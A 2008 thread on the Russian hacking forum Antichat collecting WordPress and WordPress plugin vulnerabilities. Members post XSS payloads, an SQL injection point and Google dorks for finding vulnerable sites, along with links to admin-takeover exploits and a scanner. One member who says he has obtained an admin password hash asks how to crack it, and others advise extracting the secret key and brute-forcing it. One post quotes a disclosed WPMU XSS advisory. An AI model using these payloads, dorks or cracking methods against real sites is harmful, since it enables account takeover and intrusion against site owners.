ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Wordpress Forum version 1.7.4 suffers from a cross site scripting vulnerability.
  #1  
Старый 05.09.2008, 23:09
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию Wordpress Forum version 1.7.4 suffers from a cross site scripting vulnerability.

Код:
################################################################ 
# 
# Author: FeDeReR and sinner_01 
# Home  : www.darkc0de.com & www.hacking.ge
# 
# Email : FeDeReR@avoe.ge & sinn3r01@gmail.com
# 
# Share the c0de! 
# 
################################################################ 
# 
# Xss
# 
# Soft.Site: http://www.wordpress.com/ 
# 
# Dork:Wordpress Forum 1.7.4
# 
# Dork 2:Fredrik Fahlstad. Version: 1.7.4.
# 
# Xss: http://site.com/path/?forumaction=search
#  
# Search: <script>alert(document.cookie)</script>
# 
# Xss 2: http://site.com/path/?forumaction=showforum&forum=1
# 
# Post a new topic and type: <script>alert(document.cookie)</script>
# 
# 
# 
# 
# 
################################################################
 
Ответить с цитированием

WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
  #2  
Старый 08.09.2008, 11:13
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)

WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)

Код:
in this hack we can remote change admin password, if registration enabled
................ 
6. admin's password changed, but new password will be send to correct admin email ;/
Предваряя тысячу и один вопрос "какой же пароль админа?" - отвечаю - пасс админа вы не получите согласно пункту 6.
Западлостроение, не более.
Source:
http://www.milw0rm.com/exploits/6397

Последний раз редактировалось Elekt; 08.09.2008 в 20:25..
 
Ответить с цитированием

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit
  #3  
Старый 10.09.2008, 20:21
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

http://www.milw0rm.com/exploits/6421
 
Ответить с цитированием

  #4  
Старый 12.09.2008, 07:21
Аватар для skivan
skivan
Новичок
Регистрация: 07.09.2006
Сообщений: 15
Провел на форуме:
171519

Репутация: 21
По умолчанию

А где взять файл createtables.php для генерации таблиц ? Гуглил, но не удачно...
 
Ответить с цитированием

  #5  
Старый 12.09.2008, 10:23
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Сорри что может не в тему, но у мну такой вопрос - достал адм. пасс(версия движка 2.6.2), он вот в таком виде:
admin:$P$Byn1t0aJv0ceUbWNBKQ6Z7GOOYd.Qq1
полазив по тикитам wp я так понял что там идет дополнительное хеширование md5() хеша, еще и с сальтом, есть ли какой нибудь брутер под данный вид хешей?
 
Ответить с цитированием

  #6  
Старый 13.09.2008, 05:02
Аватар для M4g
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673

Репутация: 784
Отправить сообщение для M4g с помощью ICQ
По умолчанию

>А где взять файл createtables.php для генерации таблиц ? Гуглил, но не удачно...
самому написать) но тут учти нюанс
надо 2 файла:
1. для пыха < 5.2.1
2. >=5.2.1
оба выйдут по 120 гиг в среднем
Дальше. Если радугу лень генерить, то жди работы сплойта. По моим подсчетам, ~10 часов для генерации сида)
---
ИМХО сплойт с такими раскладами бесполезен
 
Ответить с цитированием

  #7  
Старый 13.09.2008, 05:05
Аватар для M4g
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673

Репутация: 784
Отправить сообщение для M4g с помощью ICQ
По умолчанию

>admin:$P$Byn1t0aJv0ceUbWNBKQ6Z7GOOYd.Qq1
там либа phpass, забудь, это нереально)
либо вытаскивай secret_key из таблицы опций и юзай сплойт-брутфорс на одной из предыдущих страниц топика (что-то вроде salt cracking, не помню точно)
 
Ответить с цитированием

  #8  
Старый 13.09.2008, 20:17
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

сканер на Питоне

http://www.darkc0de.com/scanners/wpscan.py
 
Ответить с цитированием

WordPress MU < 2.6 wpmu-blogs.php Crose SiteScrpting vulnerability
  #9  
Старый 30.09.2008, 18:43
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию WordPress MU < 2.6 wpmu-blogs.php Crose SiteScrpting vulnerability

WordPress MU 2.6 wpmu-blogs.php Crose SiteScrpting vulnerability

Цитата:
Product: Wordpress-MU (multi-user)
Version: Versions prior to 2.6 are affected
Url: http://mu.wordpress.org
Affected by: Coss Site Scripting Attack


I. Introduction.

Wordpress-MU, or multi-user, allows to run unlimited blogs with a
single install of wordpress. It's widely used, some examples are
WordPress.com or universities like Harvard


II. Description and Impact

Wordpress-MU is affected by a Cross Site Scripting vulnerability, an
attacker can perform an XSS attack that allows him to access the
targeted user cookies to gain administrator privileges

In /wp-admin/wpmu-blogs.php an attacker can inject javascript code,
the input variables "s" and "ip_address" of GET method aren't properly
sanitized


Here is a poc:
Код:
http://site/path/wp-admin/wpmu-blogs.php?action=blogs&ip_address=XSS
Код:
http://site/path/wp-admin/wpmu-blogs.php?action=blogs&s=XSS
Цитата:
The impact is the attacker can gain administrator privileges on the
application.


III. Timeline

May 14th, 2008 - Bug discovered
May 14th, 2008 - Vendor contacted and the start of a syncronized
code patching
May 16th, 2008 - MU trunk code fixed
July 28th, 2008 - WPMU 2.6 released
September 2nd, 2008 - WPMU 2.6.1 released
September 29th, 2008 - Security advisory released


IV. Solution

Upgrade to version 2.6 or upper of wordpress multi-user. It can be
downloaded from http://mu.wordpress.org


V. Credits

Juan Galiana Lara
 
Ответить с цитированием

Уязвимости плагинов WordPress
  #10  
Старый 14.12.2008, 20:15
Аватар для M4g
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673

Репутация: 784
Отправить сообщение для M4g с помощью ICQ
По умолчанию Уязвимости плагинов WordPress

Уязвимый продукт: Wp-Forum <=2.2 (последний на данный момент)
Дорк: inurl: plugins/wp-forum

SQL-injection:

./wp-content/plugins/wp-forum/feed.php?topic=[SQL HERE]

PHP код:
    $topic $_GET['topic'];
    
    if(
$topic == "all"){
...
    }
    else{
        
$posts $wpdb->get_results("SELECT * FROM $wpforum->t_posts WHERE parent_id = $topic ORDER BY `date` DESC LIMIT 20 ");
        
$description __("Forum Topic:""wpforum")." - ".$wpforum->get_subject($topic);
        
$title get_bloginfo('name')." ".__("Forum""wpforum")." - ".__("Topic: ""wpforum")." ".$wpforum->get_subject($topic);
    } 
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Сценарии/CMF/СMS 184 15.06.2010 11:10
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Сценарии/CMF/СMS 42 07.05.2010 19:07
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Сценарии/CMF/СMS 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 E-Mail 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel E-Mail 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ